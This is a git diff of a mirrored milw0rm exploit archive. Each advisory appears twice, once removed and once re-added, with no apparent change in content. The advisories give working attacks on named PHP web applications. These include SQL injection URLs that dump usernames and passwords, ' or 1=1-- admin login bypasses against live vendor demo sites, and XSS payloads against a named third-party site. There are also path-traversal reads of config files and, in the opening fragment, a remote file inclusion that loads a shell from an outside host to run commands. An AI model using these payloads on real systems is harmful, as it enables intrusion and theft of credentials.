functions.php folder on somehost.com with an index.html with your shell inside on a php enabled server, -otherwise a functions.php shell on a php disabled one) -http://hostname/path_to_webadmin/initialize.php?hmail_config[includepath]=http://www.somehost.com/&cmd=dir - -with register_globals = on & magic_quotes_gpc = off : -http://hostname/path_to_webadmin/initialize.php?hmail_config[includepath]=c:\boot.ini%00 -http://hostname/path_to_webadmin/initialize.php?hmail_config[includepath]=http://www.somehost.com/shell.txt%00&cmd=dir -http://hostname/path_to_webadmin/initialize.php?hmail_config[includepath]=c:\Program+Files\hMailServer\Bin\hMailServer.INI%00 -http://hostname/path_to_webadmin/initialize.php?hmail_config[includepath]=../Bin/hMailServer.INI%00 - -"Bin" folder can be found in a different location, disclose the path by simply calling: - -http://hostname/path_to_webadmin/initialize.php - -interesting file: - -hMailServer.INI - 
contains two interesting fields: -- the "Administrator password" crypted with md5, -- by having knowledge of that you can calculate the MySQL root password, - specified in the "password" field. - You can do this by using the /Addons/Utilities/DecryptBlowfish.vbs script - -(*) -vulnerable code, index.php: -> Kings of injection | -| \/___/ | -| | -|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=| - - -<> Found by : Cyb3r-1sT - -<> C0ntact : cyb3r-1st [at] hotmail.com - -<> Groups : InjEctOr5 T3am - -<> site : www.tryag.cc/cc - -======================================================= -+++++++++++++++++++ Script information+++++++++++++++++ -======================================================= - - -<<->> script : Events Calendar v 1.2 - -<<->> script site : www.developiteasy.com/events-calendar-v-1.2-p-65.html?cPath=58&osCsid=7sanrl2anes1t050jhc6ivnt13 - - - -======================================================= -+++++++++++++++++++++++ Exploit +++++++++++++++++++++++ -======================================================= - - -<<->> D0rk : find it - -<<->> Exploit :>>> - - >>>> www.site.me/calendar_details.php?id=-26+union+select+0,0,concat(user_name,0x3a,user_pass),0,0,0,0,0,0,0+from+login-- - - >>> demo ::: www.developiteasy.com/events_calendar/calendar_details.php?id=-26+union+select+0,0,concat(user_name,0x3a,user_pass),0,0,0,0,0,0,0+from+login-- - - -<<->> Exploit <<->> bypass <<->> - - >>>> www.developiteasy.com/events_calendar/admin - - >>> user : cyb3r-1st ' or ' 1=1-- ( or u can use ' or 1=1-- ) - - >>> pass : cyb3r-1st ' or ' 1=1-- ( or u can use ' or 1=1-- ) - - -======================================================= -++++++++++++++++++++++ Greetz +++++++++++++++++++++++++ -======================================================= - - -<<->> All freinds and all muslims - -# milw0rm.com [2008-11-06] + || || | || + o_,_7 _|| . _o_7 _|| 4_|_|| o_w_, + ( : / (_) / ( . 
+|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=| +| _ __ __ __ ______ | +| /' \ __ /'__`\ /\ \__ /'__`\ /\ ___\ | +| /\_, \ ___ /\_\/\_\L\ \ ___\ \ ,_\/\ \/\ \ _ __\ \ \__/ | +| \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ \___``\ | +| \ \ \/\ \/\ \ \ \ \/\ \L\ \/\ \__/\ \ \_\ \ \_\ \ \ \/ \/\ \L\ \ | +| \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ \ \____/ | +| \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ \/___/ | +| \ \____/ >> Kings of injection | +| \/___/ | +| | +|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=| + + +<> Found by : Cyb3r-1sT + +<> C0ntact : cyb3r-1st [at] hotmail.com + +<> Groups : InjEctOr5 T3am + +<> site : www.tryag.cc/cc + +======================================================= ++++++++++++++++++++ Script information+++++++++++++++++ +======================================================= + + +<<->> script : Events Calendar v 1.2 + +<<->> script site : www.developiteasy.com/events-calendar-v-1.2-p-65.html?cPath=58&osCsid=7sanrl2anes1t050jhc6ivnt13 + + + +======================================================= ++++++++++++++++++++++++ Exploit +++++++++++++++++++++++ +======================================================= + + +<<->> D0rk : find it + +<<->> Exploit :>>> + + >>>> www.site.me/calendar_details.php?id=-26+union+select+0,0,concat(user_name,0x3a,user_pass),0,0,0,0,0,0,0+from+login-- + + >>> demo ::: www.developiteasy.com/events_calendar/calendar_details.php?id=-26+union+select+0,0,concat(user_name,0x3a,user_pass),0,0,0,0,0,0,0+from+login-- + + +<<->> Exploit <<->> bypass <<->> + + >>>> www.developiteasy.com/events_calendar/admin + + >>> user : cyb3r-1st ' or ' 1=1-- ( or u can use ' or 1=1-- ) + + >>> pass : cyb3r-1st ' or ' 1=1-- ( or u can use ' or 1=1-- ) + + +======================================================= +++++++++++++++++++++++ Greetz +++++++++++++++++++++++++ +======================================================= + + +<<->> All freinds 
and all muslims
+
+# milw0rm.com [2008-11-06]
diff --git a/platforms/php/webapps/7014.txt b/platforms/php/webapps/7014.txt
index e7cd58d5d..790253865 100755
--- a/platforms/php/webapps/7014.txt
+++ b/platforms/php/webapps/7014.txt
@@ -1,65 +1,64 @@ - - || || | || - o_,_7 _|| . _o_7 _|| 4_|_|| o_w_, - ( : / (_) / ( . -|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=| -| _ __ __ __ ______ | -| /' \ __ /'__`\ /\ \__ /'__`\ /\ ___\ | -| /\_, \ ___ /\_\/\_\L\ \ ___\ \ ,_\/\ \/\ \ _ __\ \ \__/ | -| \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ \___``\ | -| \ \ \/\ \/\ \ \ \ \/\ \L\ \/\ \__/\ \ \_\ \ \_\ \ \ \/ \/\ \L\ \ | -| \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ \ \____/ | -| \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ \/___/ | -| \ \____/ >> Kings of injection | -| \/___/ | -| | -|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=| - - -<> Found by : Cyb3r-1sT - -<> C0ntact : cyb3r-1st [at] hotmail.com - -<> Groups : InjEctOr5 T3am - -<> site : www.tryag.cc/cc - -======================================================= -+++++++++++++++++++ Script information+++++++++++++++++ -======================================================= - - -<<->> script : News And Article System v1.4 - -<<->> script site : www.developiteasy.com/news-and-article-system-v1.4-p-63.html?cPath=58&osCsid=7sanrl2anes1t050jhc6ivnt13 - - - -======================================================= -+++++++++++++++++++++++ Exploit +++++++++++++++++++++++ -======================================================= - - -<<->> D0rk : find it - -<<->> Exploit <<->> - - >>>> www.site.com/article_details.php?aid=[sql] - - -<<->> Exploit <<->> bypass <<->> in admin panel - - >>>> www.developiteasy.com/article_system/admin - - >>> user : cyb3r-1st ' or ' 1=1-- ( or u can use ' or 1=1-- ) - - >>> pass : cyb3r-1st ' or ' 1=1-- ( or u can use ' or 1=1-- ) - -======================================================= -++++++++++++++++++++++ Greetz +++++++++++++++++++++++++ -======================================================= - - -<<->> All freinds and all muslims - -# milw0rm.com [2008-11-06] + || || | || + o_,_7 _|| . _o_7 _|| 4_|_|| o_w_, + ( : / (_) / ( . 
+|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=| +| _ __ __ __ ______ | +| /' \ __ /'__`\ /\ \__ /'__`\ /\ ___\ | +| /\_, \ ___ /\_\/\_\L\ \ ___\ \ ,_\/\ \/\ \ _ __\ \ \__/ | +| \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ \___``\ | +| \ \ \/\ \/\ \ \ \ \/\ \L\ \/\ \__/\ \ \_\ \ \_\ \ \ \/ \/\ \L\ \ | +| \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ \ \____/ | +| \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ \/___/ | +| \ \____/ >> Kings of injection | +| \/___/ | +| | +|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=| + + +<> Found by : Cyb3r-1sT + +<> C0ntact : cyb3r-1st [at] hotmail.com + +<> Groups : InjEctOr5 T3am + +<> site : www.tryag.cc/cc + +======================================================= ++++++++++++++++++++ Script information+++++++++++++++++ +======================================================= + + +<<->> script : News And Article System v1.4 + +<<->> script site : www.developiteasy.com/news-and-article-system-v1.4-p-63.html?cPath=58&osCsid=7sanrl2anes1t050jhc6ivnt13 + + + +======================================================= ++++++++++++++++++++++++ Exploit +++++++++++++++++++++++ +======================================================= + + +<<->> D0rk : find it + +<<->> Exploit <<->> + + >>>> www.site.com/article_details.php?aid=[sql] + + +<<->> Exploit <<->> bypass <<->> in admin panel + + >>>> www.developiteasy.com/article_system/admin + + >>> user : cyb3r-1st ' or ' 1=1-- ( or u can use ' or 1=1-- ) + + >>> pass : cyb3r-1st ' or ' 1=1-- ( or u can use ' or 1=1-- ) + +======================================================= +++++++++++++++++++++++ Greetz +++++++++++++++++++++++++ +======================================================= + + +<<->> All freinds and all muslims + +# milw0rm.com [2008-11-06] diff --git a/platforms/php/webapps/7015.txt b/platforms/php/webapps/7015.txt index f94fcde8f..c2a010774 100755 --- a/platforms/php/webapps/7015.txt 
+++ b/platforms/php/webapps/7015.txt 
@@ -1,69 +1,68 @@ - - || || | || - o_,_7 _|| . _o_7 _|| 4_|_|| o_w_, - ( : / (_) / ( . -|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=| -| _ __ __ __ ______ | -| /' \ __ /'__`\ /\ \__ /'__`\ /\ ___\ | -| /\_, \ ___ /\_\/\_\L\ \ ___\ \ ,_\/\ \/\ \ _ __\ \ \__/ | -| \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ \___``\ | -| \ \ \/\ \/\ \ \ \ \/\ \L\ \/\ \__/\ \ \_\ \ \_\ \ \ \/ \/\ \L\ \ | -| \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ \ \____/ | -| \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ \/___/ | -| \ \____/ >> Kings of injection | -| \/___/ | -| | -|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=| - - -<> Found by : Cyb3r-1sT - -<> C0ntact : cyb3r-1st [at] hotmail.com - -<> Groups : InjEctOr5 T3am - -<> site : www.tryag.cc/cc - -======================================================= -+++++++++++++++++++ Script information+++++++++++++++++ -======================================================= - - -<<->> script : Membership System V1.3 - -<<->> script site : www.developiteasy.com/membership-system-v1.3-p-66.html?cPath=58&osCsid=7sanrl2anes1t050jhc6ivnt13 - - - -======================================================= -+++++++++++++++++++++++ Exploit +++++++++++++++++++++++ -======================================================= - - -<<->> D0rk : find it - -<<->> Exploit <<->> bypass <<->> - - >>>> www.developiteasy.com/membership_system/customer_login.php - - >>> user : cyb3r@1st ' or ' 1=1-- ( or u can use ' or 1=1-- ) - - >>> pass : cyb3r@1st ' or ' 1=1-- ( or u can use ' or 1=1-- ) - - -<<->> Exploit <<->> bypass <<->> in admin panel - - >>>> www.developiteasy.com/membership_system/admin - - >>> user : cyb3r-1st ' or ' 1=1-- ( or u can use ' or 1=1-- ) - - >>> pass : cyb3r-1st ' or ' 1=1-- ( or u can use ' or 1=1-- ) - -======================================================= -++++++++++++++++++++++ Greetz +++++++++++++++++++++++++ 
-======================================================= - - -<<->> All freinds and all muslims - -# milw0rm.com [2008-11-06] + || || | || + o_,_7 _|| . _o_7 _|| 4_|_|| o_w_, + ( : / (_) / ( . +|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=| +| _ __ __ __ ______ | +| /' \ __ /'__`\ /\ \__ /'__`\ /\ ___\ | +| /\_, \ ___ /\_\/\_\L\ \ ___\ \ ,_\/\ \/\ \ _ __\ \ \__/ | +| \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ \___``\ | +| \ \ \/\ \/\ \ \ \ \/\ \L\ \/\ \__/\ \ \_\ \ \_\ \ \ \/ \/\ \L\ \ | +| \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ \ \____/ | +| \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ \/___/ | +| \ \____/ >> Kings of injection | +| \/___/ | +| | +|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=| + + +<> Found by : Cyb3r-1sT + +<> C0ntact : cyb3r-1st [at] hotmail.com + +<> Groups : InjEctOr5 T3am + +<> site : www.tryag.cc/cc + +======================================================= ++++++++++++++++++++ Script information+++++++++++++++++ +======================================================= + + +<<->> script : Membership System V1.3 + +<<->> script site : www.developiteasy.com/membership-system-v1.3-p-66.html?cPath=58&osCsid=7sanrl2anes1t050jhc6ivnt13 + + + +======================================================= ++++++++++++++++++++++++ Exploit +++++++++++++++++++++++ +======================================================= + + +<<->> D0rk : find it + +<<->> Exploit <<->> bypass <<->> + + >>>> www.developiteasy.com/membership_system/customer_login.php + + >>> user : cyb3r@1st ' or ' 1=1-- ( or u can use ' or 1=1-- ) + + >>> pass : cyb3r@1st ' or ' 1=1-- ( or u can use ' or 1=1-- ) + + +<<->> Exploit <<->> bypass <<->> in admin panel + + >>>> www.developiteasy.com/membership_system/admin + + >>> user : cyb3r-1st ' or ' 1=1-- ( or u can use ' or 1=1-- ) + + >>> pass : cyb3r-1st ' or ' 1=1-- ( or u can use ' or 1=1-- ) + +======================================================= 
+++++++++++++++++++++++ Greetz +++++++++++++++++++++++++
+=======================================================
+
+
+<<->> All freinds and all muslims
+
+# milw0rm.com [2008-11-06]
diff --git a/platforms/php/webapps/7016.txt b/platforms/php/webapps/7016.txt
index d8ef7e017..57760b9a3 100755
--- a/platforms/php/webapps/7016.txt
+++ b/platforms/php/webapps/7016.txt
@@ -1,66 +1,65 @@ - - || || | || - o_,_7 _|| . _o_7 _|| 4_|_|| o_w_, - ( : / (_) / ( . -|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=| -| _ __ __ __ ______ | -| /' \ __ /'__`\ /\ \__ /'__`\ /\ ___\ | -| /\_, \ ___ /\_\/\_\L\ \ ___\ \ ,_\/\ \/\ \ _ __\ \ \__/ | -| \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ \___``\ | -| \ \ \/\ \/\ \ \ \ \/\ \L\ \/\ \__/\ \ \_\ \ \_\ \ \ \/ \/\ \L\ \ | -| \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ \ \____/ | -| \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ \/___/ | -| \ \____/ >> Kings of injection | -| \/___/ | -| | -|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=| - - -<> Found by : Cyb3r-1sT - -<> C0ntact : cyb3r-1st [at] hotmail.com - -<> Groups : InjEctOr5 T3am - -<> site : www.tryag.cc/cc - -======================================================= -+++++++++++++++++++ Script information+++++++++++++++++ -======================================================= - - -<<->> script : Photo Gallery v1.2 - -<<->> script site : www.developiteasy.com/photo-gallery-v1.2-p-62.html?cPath=58&osCsid=7sanrl2anes1t050jhc6ivnt13 - - - -======================================================= -+++++++++++++++++++++++ Exploit +++++++++++++++++++++++ -======================================================= - - -<<->> D0rk : find it - -<<->> Exploit <<->> - - >>>> www.site.com/gallery_category.php?cat_id=[sql] - >>>> www.site.com/gallery_photo.php?photo_id=[sql] - - -<<->> Exploit <<->> bypass <<->> in admin panel - - >>>> www.developiteasy.com/photogallery/admin - - >>> user : cyb3r-1st ' or ' 1=1-- ( or u can use ' or 1=1-- ) - - >>> pass : cyb3r-1st ' or ' 1=1-- ( or u can use ' or 1=1-- ) - -======================================================= -++++++++++++++++++++++ Greetz +++++++++++++++++++++++++ -======================================================= - - -<<->> All freinds and all muslims - -# milw0rm.com [2008-11-06] + || || | || + o_,_7 _|| . 
_o_7 _|| 4_|_|| o_w_, + ( : / (_) / ( . +|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=| +| _ __ __ __ ______ | +| /' \ __ /'__`\ /\ \__ /'__`\ /\ ___\ | +| /\_, \ ___ /\_\/\_\L\ \ ___\ \ ,_\/\ \/\ \ _ __\ \ \__/ | +| \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ \___``\ | +| \ \ \/\ \/\ \ \ \ \/\ \L\ \/\ \__/\ \ \_\ \ \_\ \ \ \/ \/\ \L\ \ | +| \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ \ \____/ | +| \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ \/___/ | +| \ \____/ >> Kings of injection | +| \/___/ | +| | +|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=| + + +<> Found by : Cyb3r-1sT + +<> C0ntact : cyb3r-1st [at] hotmail.com + +<> Groups : InjEctOr5 T3am + +<> site : www.tryag.cc/cc + +======================================================= ++++++++++++++++++++ Script information+++++++++++++++++ +======================================================= + + +<<->> script : Photo Gallery v1.2 + +<<->> script site : www.developiteasy.com/photo-gallery-v1.2-p-62.html?cPath=58&osCsid=7sanrl2anes1t050jhc6ivnt13 + + + +======================================================= ++++++++++++++++++++++++ Exploit +++++++++++++++++++++++ +======================================================= + + +<<->> D0rk : find it + +<<->> Exploit <<->> + + >>>> www.site.com/gallery_category.php?cat_id=[sql] + >>>> www.site.com/gallery_photo.php?photo_id=[sql] + + +<<->> Exploit <<->> bypass <<->> in admin panel + + >>>> www.developiteasy.com/photogallery/admin + + >>> user : cyb3r-1st ' or ' 1=1-- ( or u can use ' or 1=1-- ) + + >>> pass : cyb3r-1st ' or ' 1=1-- ( or u can use ' or 1=1-- ) + +======================================================= +++++++++++++++++++++++ Greetz +++++++++++++++++++++++++ +======================================================= + + +<<->> All freinds and all muslims + +# milw0rm.com [2008-11-06] 
diff --git a/platforms/php/webapps/7017.txt b/platforms/php/webapps/7017.txt
index ba9da3b82..83c8bd1fb 100755
--- a/platforms/php/webapps/7017.txt
+++ b/platforms/php/webapps/7017.txt
@@ -1,47 +1,47 @@
--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
- IN THE NAME OF ALLAH
--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-Pre ADS Portal <= 2.0 Multiple Vulnerabilities
--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-
-[~] Script: Pre ADS Portal
-[~] Language : PHP
-[~] Website[main]: http://www.preproject.com
-[~] Website[script]: http://www.preproject.com/ads.asp
-[~] Type : Commercial
-[~] Report-Date : 05/11/2008
-[~] Founder : G4N0K
-
-===============================================================================
-===[ Admin BYpass ]===
-[!] http://localhost/[path]/homeadmin/adminhome.php
-
-===[ Admin BYpass-LIVE ]===
-http://www.mideastbiz.com/homeadmin/adminhome.php
-
-
-
-===[ XSS ]===
-[!] http://localhost/[path]/homeadmin/adminhome.php?pg=1&msg=XSS
-[!] http://localhost/[path]/homeadmin/signinform.php?msg=XSS
-
-===[ XSS-LIVE ]===
-[!]http://www.mideastbiz.com/homeadmin/adminhome.php?pg=1&msg=g4n0k%22%3E%3Cscript%3Ealert('G4N0K')%3C/script%3E
-http://www.mideastbiz.com/homeadmin/signinform.php?msg=g4n0k%22%3E%3Cscript%3Ealert('G4N0K')%3C/script%3E
-
-
-
-===[ Greetz ]===
-[~] ALLAH
-[~] Tornado2800
-[~] Hussain-X
-
-//Are ya looking for something that has not BUGz at all...!? I know it... It's The Holy Quran. [:-)
-//ALLAH,forgimme...
-
--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-exit(); //EoX
--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-
-# milw0rm.com [2008-11-06]
+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+ IN THE NAME OF ALLAH
+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+Pre ADS Portal <= 2.0 Multiple Vulnerabilities
+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+
+[~] Script: Pre ADS Portal
+[~] Language : PHP
+[~] Website[main]: http://www.preproject.com
+[~] Website[script]: http://www.preproject.com/ads.asp
+[~] Type : Commercial
+[~] Report-Date : 05/11/2008
+[~] Founder : G4N0K
+
+===============================================================================
+===[ Admin BYpass ]===
+[!] http://localhost/[path]/homeadmin/adminhome.php
+
+===[ Admin BYpass-LIVE ]===
+http://www.mideastbiz.com/homeadmin/adminhome.php
+
+
+
+===[ XSS ]===
+[!] http://localhost/[path]/homeadmin/adminhome.php?pg=1&msg=XSS
+[!] http://localhost/[path]/homeadmin/signinform.php?msg=XSS
+
+===[ XSS-LIVE ]===
+[!]http://www.mideastbiz.com/homeadmin/adminhome.php?pg=1&msg=g4n0k%22%3E%3Cscript%3Ealert('G4N0K')%3C/script%3E
+http://www.mideastbiz.com/homeadmin/signinform.php?msg=g4n0k%22%3E%3Cscript%3Ealert('G4N0K')%3C/script%3E
+
+
+
+===[ Greetz ]===
+[~] ALLAH
+[~] Tornado2800
+[~] Hussain-X
+
+//Are ya looking for something that has not BUGz at all...!? I know it... It's The Holy Quran. [:-)
+//ALLAH,forgimme...
+
+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+exit(); //EoX
+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+
+# milw0rm.com [2008-11-06]
diff --git a/platforms/php/webapps/7018.txt b/platforms/php/webapps/7018.txt
index 840a5eb8f..2492f1c96 100755
--- a/platforms/php/webapps/7018.txt
+++ b/platforms/php/webapps/7018.txt
@@ -1,57 +1,57 @@ -################################################################ -# .___ __ _______ .___ # -# __| _/____ _______| | __ ____ \ _ \ __| _/____ # -# / __ |\__ \\_ __ \ |/ // ___\/ /_\ \ / __ |/ __ \ # -# / /_/ | / __ \| | \/ <\ \___\ \_/ \/ /_/ \ ___/ # -# \____ |(______/__| |__|_ \\_____>\_____ /\_____|\____\ # -# \/ \/ \/ # -# ___________ ______ _ __ # -# _/ ___\_ __ \_/ __ \ \/ \/ / # -# \ \___| | \/\ ___/\ / # -# \___ >__| \___ >\/\_/ # -# est.2007 \/ \/ forum.darkc0de.com # -################################################################ -# --d3hydr8 -rsauron-baltazar -sinner_01 -C1c4Tr1Z - beenu # -#- Nik-P47tr1ck- FeDeReR -MAGE -JeTFyrE- DON-Outlawz # -# and all darkc0de and DarkTrix members --# -################################################################ -# -# Author: r45c4l -# -# Home : www.darkc0de.com & darktrix.info -# -# Email : r45c4l@hotmail.com -# -# Share the c0de! -# -################################################################ -# -# Title: NICE FAQ Script (Auth Bypass) SQl Injection Vulnerability -# -# -########################################################### -# -# Script Vendor: http://www.nicephpscripts.com/PHP-FAQ-Script-Knowledgebase-Script.htm -# -########################################################### - - Go To Admin Panel : - - Login With this information : - - Admin : Admin - - pass : ' OR 1=1-- - - - Live Demo : - - http://www.nicephpscripts.com/scripts/faqscript/admin/ - - -########################################################### -# -# Bug discovered : 06 Nov 2008 -########################################################### - -# milw0rm.com [2008-11-06] +################################################################ +# .___ __ _______ .___ # +# __| _/____ _______| | __ ____ \ _ \ __| _/____ # +# / __ |\__ \\_ __ \ |/ // ___\/ /_\ \ / __ |/ __ \ # +# / /_/ | / __ \| | \/ <\ \___\ \_/ \/ /_/ \ ___/ # +# \____ |(______/__| |__|_ \\_____>\_____ /\_____|\____\ # +# \/ \/ \/ # +# ___________ ______ _ __ # 
+# _/ ___\_ __ \_/ __ \ \/ \/ / # +# \ \___| | \/\ ___/\ / # +# \___ >__| \___ >\/\_/ # +# est.2007 \/ \/ forum.darkc0de.com # +################################################################ +# --d3hydr8 -rsauron-baltazar -sinner_01 -C1c4Tr1Z - beenu # +#- Nik-P47tr1ck- FeDeReR -MAGE -JeTFyrE- DON-Outlawz # +# and all darkc0de and DarkTrix members --# +################################################################ +# +# Author: r45c4l +# +# Home : www.darkc0de.com & darktrix.info +# +# Email : r45c4l@hotmail.com +# +# Share the c0de! +# +################################################################ +# +# Title: NICE FAQ Script (Auth Bypass) SQl Injection Vulnerability +# +# +########################################################### +# +# Script Vendor: http://www.nicephpscripts.com/PHP-FAQ-Script-Knowledgebase-Script.htm +# +########################################################### + + Go To Admin Panel : + + Login With this information : + + Admin : Admin + + pass : ' OR 1=1-- + + + Live Demo : + + http://www.nicephpscripts.com/scripts/faqscript/admin/ + + +########################################################### +# +# Bug discovered : 06 Nov 2008 +########################################################### + +# milw0rm.com [2008-11-06] diff --git a/platforms/php/webapps/7019.txt b/platforms/php/webapps/7019.txt index a4d8d0777..4fd381914 100755 --- a/platforms/php/webapps/7019.txt +++ b/platforms/php/webapps/7019.txt 
@@ -1,29 +1,29 @@ -##################################################################################### -#### Arab Portal v2.1 Remote File Disclosure (Win32) #### -##################################################################################### -# # -#AUTHOR : IRCRASH (R3d.W0rm (Sina Yazdanmehr)) # -#Discovered by : R3d.W0rm (Sina Yazdanmehr) # -#Our Site : Http://IRCRASH.COM # -#IRCRASH Team Members : Dr.Crash - R3d.w0rm (Sina Yazdanmehr) - Hadi Kiamarsi # -##################################################################################### -# # -#Download : www.arabportal.net # -# # -#DORK : Powered by: Arab Portal inurl:mod.php?mod=html # -# # -##################################################################################### -# [Bug] # -# # -#http://Site/[path]/mod.php?mod=html&modfile=show&file=..\File.Type # -# # -#Config File : # -#http://Site/[path]/mod.php?mod=html&modfile=show&file=..\..\..\admin\conf.php # -# # -#Note : This bug only work on windows servers . # -# # -##################################################################################### -# Site : Http://IRCRASH.COM # -###################################### TNX GOD ###################################### - -# milw0rm.com [2008-11-06] +##################################################################################### +#### Arab Portal v2.1 Remote File Disclosure (Win32) #### +##################################################################################### +# # +#AUTHOR : IRCRASH (R3d.W0rm (Sina Yazdanmehr)) # +#Discovered by : R3d.W0rm (Sina Yazdanmehr) # +#Our Site : Http://IRCRASH.COM # +#IRCRASH Team Members : Dr.Crash - R3d.w0rm (Sina Yazdanmehr) - Hadi Kiamarsi # +##################################################################################### +# # +#Download : www.arabportal.net # +# # +#DORK : Powered by: Arab Portal inurl:mod.php?mod=html # +# # +##################################################################################### +# [Bug] # +# # 
+#http://Site/[path]/mod.php?mod=html&modfile=show&file=..\File.Type # +# # +#Config File : # +#http://Site/[path]/mod.php?mod=html&modfile=show&file=..\..\..\admin\conf.php # +# # +#Note : This bug only work on windows servers . # +# # +##################################################################################### +# Site : Http://IRCRASH.COM # +###################################### TNX GOD ###################################### + +# milw0rm.com [2008-11-06] diff --git a/platforms/php/webapps/702.pl b/platforms/php/webapps/702.pl index 441b19ad4..c59bdbac5 100755 --- a/platforms/php/webapps/702.pl +++ b/platforms/php/webapps/702.pl @@ -209,6 +209,6 @@ push(@d for my $d (@dirs) { DoDir($d); } -} - -# milw0rm.com [2004-12-22] +} + +# milw0rm.com [2004-12-22] diff --git a/platforms/php/webapps/7020.txt b/platforms/php/webapps/7020.txt index 5dd4f49fc..7e6b8db29 100755 --- a/platforms/php/webapps/7020.txt +++ b/platforms/php/webapps/7020.txt 
@@ -1,64 +1,64 @@
-##################################################################################
-# #
-# Author: Vinod Sharma #
-# Email: vinodsharma.mimit@gmail.com #
-# Date: 05th Nov, 2008 #
-# Note: This information is only for educational purpose, author #
-# will not bear responsibility for any damages. #
-##################################################################################
-
-
-#########################################################################################
-#Directory traversal vulnerability in MySQL Quick Admin 1.5.5 #
-#allows remote attackers to read and execute arbitrary files via a .. (dot dot) #
